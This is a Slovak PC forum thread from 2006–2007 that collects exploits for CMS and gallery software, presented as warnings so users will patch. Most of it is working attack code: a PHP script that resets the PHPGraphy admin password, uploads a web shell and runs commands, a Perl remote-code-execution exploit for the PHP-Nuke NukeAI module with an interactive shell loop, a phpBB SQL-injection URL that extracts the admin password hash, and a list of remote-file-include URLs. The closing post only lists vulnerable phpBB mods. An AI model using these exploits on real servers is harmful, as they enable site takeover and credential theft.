[ Príspevkov: 5 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Redakčné a iné systémy - SECURITY

Registrovaný: 13.07.06
Prihlásený: 22.10.07
Príspevky: 61
Témy: 5 | 5
NapísalOffline : 01.12.2006 12:19 | Redakčné a iné systémy - SECURITY

Kedze coraz viac a viac ludi pouziva rozne redakcne systemy a spravy fotogalerii a podobne myslim ze je na mieste poukazat aj na to, ze tieto kody maju urcite chyby.

Ak o nejakych viete pridajte info o chybe.
Pripajam zoznam takych najcerstvejsich, postupne podla toho kolko budem mat casu budem pridavat tie co najdem.

Pripominam, ze toto niesu navody ako niekoho poskodit ale navody pre ludi ktori pouzivaju dany system aby bud aktualizovali na aktualnu verziu pripadne upravili zdrojak tak aby sa dana chyba nedala vyuzit.



PHPGraphy 0.9.12 sprava fotografii

Typ: Commands Execution Exploit

Kód:
<?php
print_r('
---------------------------------------------------------------------------
PHPGraphy 0.9.12 Zend_Hash_Del_Key_Or_Index/privilege escalation/
/remote command execution exploit
by rgod
dork: intext:"This site is using phpGraphy" | intitle:"my
phpgraphy site"
mail: retrog@alice.it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');

/*
works against register_globals=on
*/

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host:      target server (ip/hostname)
path:      path to PHPGraphy
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /phpgraphy/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost / cat ./data/users.dat -p81
---------------------------------------------------------------------------
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n";
$exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to
".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo
'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

//reset admin password...
//let's reactivate :) the *install mode* to do that
//you will be able to login with user -> suntzu, password -> suntzu
$data ="login=suntzu";
$data.="&password=suntzu";
$data.="&security_level=999"; //god
$data.="&uid=0";
$data.="&submit=Submit";
$packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Referer:
http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: mode=um; install_mode=1; 2095608056=1;
-285023552=1; action=edit;\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(2);

//login as admin...
$data ="user=suntzu";
$data.="&pass=suntzu";
$data.="&dir=";
$data.="&rememberme=on";
$data.="&startlogin=1";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer:
http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\n";
sleep(1);

//upload the *evil* shell
//some tricks with "config" and "dir" to escape from
the pictures/ dir, .htaccess protected
//you need a writable folder, if not succeeded try some of theese paths:
./themes, ./docs, ./base
//for "dir" argument, let's create a *fake* config.php in main
folder
$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pictures[]";
filename="config.php";

<?php set_time_limit(0);error_reporting(7);echo "my_delim";
passthru($_SERVER["HTTP_CLIENT_IP"]); echo
"my_delim";?>
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="picupload"

1
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer:
http:/".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: config=; -578819025=1; -747504677=1; dir=.;
2087386682=1; 2090185412=1; ".$cookie."\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

//launch commands...
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("my_delim",$html)){
    $temp=explode("my_delim",$html);
    echo $temp[1];
}
else {
    echo "exploit failed...";
}
?>


Offline

Užívateľ
Užívateľ
Redakčné a iné systémy - SECURITY

Registrovaný: 13.07.06
Prihlásený: 22.10.07
Príspevky: 61
Témy: 5 | 5
Napísal autor témyOffline : 01.12.2006 12:21 | Redakčné a iné systémy - SECURITY

PHP-Nuke NukeAI Module 3b ( util.php )

Typ: Remote File Include Exploit

Kód:
#!/usr/bin/perl
#
+-------------------------------------------------------------------------------------------
# + nukeai beta3 (util.php) Remote Code Execution Vulnerability
#
+-------------------------------------------------------------------------------------------
# + Affected Software .: nukeai beta3
# + Download ..........:
http://mesh.dl.sourceforge.net/sourceforge/nukeai/nukeai_beta3.zip
# + Dork ..............: "nukeai beta3"
# + Class .............: Remote Code Execution
# + Risk ..............: High (Remote Code Execution)
# + Found By ..........: DeltahackingTEAM Code :Dr.Trojan&Dr.Pantagon
# +
Exploit:http://[target]/[path]/modules/NukeAI/util.php?AIbasedir=http://
#
+-------------------------------------------------------------------------------------------
# + Details:
# + nukeai beta3 Download by default installation doesn't prevent any of
the files in the
# + modules/NukeAI directory from being accessed by a client. The
modules/NukeAI
# + file takes input passed to the script by util.php and writes it to
$_POST["filename"].0
# + unsanatized in the modules/NukeAI descriptions directory.
# +
# + Vulnerable Code:
# +require_once $AIbasedir."/NukeAI/util.php";
#
+-------------------------------------------------------------------------------------------
# Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell]

use Getopt::Long;
use URI::Escape;
use IO::Socket;

$code = "<?php passthru(\$_GET[cmd]); ?>";

main();

sub usage
{
    print "DeltahackingSecurityTEAM\n";
    print "www.deltahacking.net\n";
    print
"Dr.Trojan,HIV++,D_7j,Lord,VPc,IMpostor,Dr.Pantagon\n";
    print " http://advistory.deltahacking.net((we Bug))\n";
    print "\nukeai beta3 Remote Code Execution Exploit\n";
    print "-h, --host\ttarget host\t(example.com)\n";
    print "-f, --file\tshell file\t(shell.php)\n";
    print "-d, --dir\tinstall dir\t(/NukeAI)\n";
    print
"============================================================================farzad.sharifi\r\n";
    exit;
}

sub main
{
    GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s'
=> \$dir);
    usage() unless $host;

    $dir = "/NukeAI" unless $dir;
    $file = "shell.php" unless $file;
    uri_escape($cmd);
    $sock =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "\nconnect() failed.\n";

    print "\nconnected to ".$host.", sending
data.\n";
    $sendurl =
"description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit";
    $sendlen = length($sendurl);
    print $sock "POST ".$dir."NukeAI/util.php?AIbasedir=
HTTP/1.1\n";
    print $sock "Host: ".$host."\n";
    print $sock "Connection: close\n";
    print $sock "Content-Type:
application/x-www-form-urlencoded\n";
    print $sock "Content-Length: ".$sendlen."\n\n";
    print $sock $sendurl;
    print "attempted to create php shell, server
response:\n\n";
    while($recvd = <$sock>)
    {
        print " ".$recvd."";
    }

    while($cmd !~ "~quit")
    {
        print "\n\n-> ";
        $cmd = <STDIN>;
        if ($cmd !~ "~quit")
        {
          $sock =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
           or die "connect() failed.\n";
          $sendurl = uri_escape($cmd);

          print $sock "GET
".$dir."/descriptions/".$file.".0?cmd=".$sendurl."
HTTP/1.1\n";
          print $sock "Host: ".$host."\n";
          print $sock "Accept: */*\n";
          print $sock "Connection: close\n\n";
          print "\n";

          while($recvd = <$sock>)
          {
              print $recvd;
          }
        }
    }
    exit;
}



Offline

Užívateľ
Užívateľ
Redakčné a iné systémy - SECURITY

Registrovaný: 13.07.06
Prihlásený: 22.10.07
Príspevky: 61
Témy: 5 | 5
Napísal autor témyOffline : 01.12.2006 12:25 | Redakčné a iné systémy - SECURITY

phpBB

Typ: Remote SQL Injection Vulnerability

Kód:
http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash


Offline

Užívateľ
Užívateľ
Redakčné a iné systémy - SECURITY

Registrovaný: 13.07.06
Prihlásený: 22.10.07
Príspevky: 61
Témy: 5 | 5
Napísal autor témyOffline : 01.12.2006 12:27 | Redakčné a iné systémy - SECURITY

Fully Modded phpBB

Typ: Multiple File Include Vulnerabilities

Kód:
##############################################################
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

##############################################################

Source Code:
   http://phpbbfm.net/support/index_fm.php
   http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz
###################################################

Vulnerable Code:_
include('includes/common.php');
$phpbb_root_path = $foing_root_path . $phpbb_root_path;
In
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php

###################################################

Exploit :
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?
###################################################

Discoverd By :  020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM
& WwW.Tryag.CoM & WwW.Xp020.CoM
###################################################


Offline

Prevádzkovateľ fóra
Prevádzkovateľ fóra
Redakčné a iné systémy - SECURITY

Registrovaný: 01.05.05
Príspevky: 12419
Témy: 1447 | 1447
Bydlisko: Bratislava
Vek: 32
NapísalOffline : 03.02.2007 13:20 | Redakčné a iné systémy - SECURITY

Malý zozam modifikácií na phpBB, cez ktoré sa dá nabúrať fórum.
Tieto modifikácie si na fórum neinštalujte, stane sa tak zranitelným.

phpRaid: File Inclusion Vulnerability
pafileDB: File Inclusion Vulnerability
Auction: File Inclusion Vulnerability
Knowledge Base Mod: SQL-Injection
Advanced GuestBook: File Inclusion Vulnerability
TopList: File Inclusion Vulnerability
Backup sql Mod: File Inclusion Vulnerability
Activity MOD Plus: File Inclusion Vulnerability
hacks_list: File Inclusion Vulnerability
Topic Calendar: XSS
LDMan Pro: sql injection
Calendar Pro: sql injection
Datenbank mod: Remote File Vulnerability
Smilies Album 1.1.0: XSS Vulnerability
THoRCMS: Remote File Vulnerability
Blend Portal: Remote File Vulnerability
All Topics Hack: Sql injection
User Class Mod: Sql injection
Most Used Languages Module: Sql injection
mail2forum: File Inclusion Vulnerability
Cracker Tracker Professional: DoS Flooder
Personal Notes: Xss Vulnerability
Cracker Tracker Professional: Xss Vulnerability
Calendar Lite: Xss Vulnerability
All Topics Mod: SQL Injection
PhpBB Album mod: File Inclusion Vulnerability
phpBB Shadow Premod: File Inclusion Vulnerability
Security Suite Mod 1.0.0: File Inclusion Vulnerability
Admin Topic Action Logging Mod: File Inclusion Vulnerability
User Viewed Posts Tracker: File Inclusion Vulnerability
Random User Registrationr: File Inclusion Vulnerability
Amazonia Mod: File Inclusion Vulnerability
News Defilante Horizontal: File Inclusion Vulnerability
lat2cyr Mod 1.0.1: File Inclusion Vulnerability
SpamOborona Mod: File Inclusion Vulnerability
RPG Events 1.0: File Inclusion Vulnerability
SearchIndexer Mod: File Inclusion Vulnerability
Prillian French Mod: File Inclusion Vulnerability
ACP User Registration Mod 1.0: File Inclusion Vulnerability
Security: File Inclusion Vulnerability
Journals System Mod 1.0.2: File Inclusion Vulnerability
Insert User Mod: File Inclusion Vulnerability
Import Tools Mod: File Inclusion Vulnerability
Ajax Shoutbox: File Inclusion Vulnerability
SpamBlocker Mod: File Inclusion Vulnerability


_________________
SilverStone SST CS01 | Corsair SF600 600W SFX | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 (16 Cores / 32 Threads) & Noctua NH-U9DX i4 | Kingston HyperX Savage 32 GB DDR4 2400 MHz | PNY NVIDIA Quadro K1200 DP 4 GB DDR5 | Intel SSD 750 1.2 TB NVMe & Intel SSD 730 240 GB SATA & Seagate BackUp Plus Portable 12 TB USB | 31.5" 4K LCD EIZO FlexScan EV3237 & 2 x 24" LCD EIZO FlexScan EV2451 | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech Wireless G700s | Harman Kardon Nova | Microsoft Windows 7 Ultimate | APC Back-UPS ES 700 | Lenovo ThinkPad X250 - Intel Core i7 5600U, 8 GB DDR3 1600 MHz, Intel HD Graphics 5500, SanDisk SSD 512 GB, 12.5 FHD LED IPS, WWAN 3G 4G LTE, Microsoft Windows 7 Ultimate | Nintendo Classic Mini | BlackBerry Passport 96 GB
 [ Príspevkov: 5 ] 


Redakčné a iné systémy - SECURITY



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

Redakčné systémy pre videá

v Redakčné systémy

4

355

05.01.2012 13:47

don jebot

V tomto fóre nie sú ďalšie neprečítané témy.

Mozem mat v 1 MySQL databaze 2 redakcne systemy?

v Databázy

2

360

11.04.2010 11:21

maťo*

V tomto fóre nie sú ďalšie neprečítané témy.

Nová podkategória "Redakčné systémy"

v Správy pre vedenie fóra

2

588

02.02.2011 15:36

programmer

V tomto fóre nie sú ďalšie neprečítané témy.

Pri starte mi vyhadzuje ine systemy

v Operačné systémy Microsoft

1

195

17.11.2009 16:47

vazovski

V tomto fóre nie sú ďalšie neprečítané témy.

ESET Smart Security 4 vs. Norton Internet Security 2010

v Antivíry a antispywary

5

675

14.03.2010 17:25

Snipo

V tomto fóre nie sú ďalšie neprečítané témy.

Norton Internet Security 2010 vs. Eset Smart Security

v Antivíry a antispywary

17

1169

12.04.2010 8:33

lubos250

V tomto fóre nie sú ďalšie neprečítané témy.

Eset Smart Security 4 vs MS Security Essentials

[ Choď na stránku:Choď na stránku: 1, 2 ]

v Antivíry a antispywary

34

2635

11.02.2010 17:54

Mindfreak

V tomto fóre nie sú ďalšie neprečítané témy.

Eset Smart Security vs. AVIRA Premium Security Suite

v Antivíry a antispywary

3

923

14.05.2009 21:14

emajko159

V tomto fóre nie sú ďalšie neprečítané témy.

Kaspersky Internet Security 2009 vs. Eset Smart Security

v Antivíry a antispywary

8

1404

07.10.2008 0:43

Kosak

V tomto fóre nie sú ďalšie neprečítané témy.

Eset Smart Security 4 vs AVG Internet security 8.5

v Antivíry a antispywary

23

2021

14.07.2009 16:27

citizen

V tomto fóre nie sú ďalšie neprečítané témy.

ESET Smart Security 4.2 a ESET Mail Security for MES

v Novinky

5

389

13.03.2010 20:09

XxRENDYxX

V tomto fóre nie sú ďalšie neprečítané témy.

Avast 7 Internet Security alebo AVG Internet Security 2012

v Antivíry a antispywary

5

545

22.04.2012 0:30

Leslie12

V tomto fóre nie sú ďalšie neprečítané témy.

Php systemy

v Redakčné systémy

3

890

09.07.2008 16:26

Triminka

V tomto fóre nie sú ďalšie neprečítané témy.

operacne systemy

v Operačné systémy Microsoft

10

310

30.10.2008 0:45

prandof

V tomto fóre nie sú ďalšie neprečítané témy.

2 systemy

v Operačné systémy Microsoft

13

208

09.12.2012 12:51

juri23

V tomto fóre nie sú ďalšie neprečítané témy.

dva systémy

v Operačné systémy Microsoft

12

483

28.02.2011 11:55

walther



© 2005 - 2017 PCforum, edited by JanoF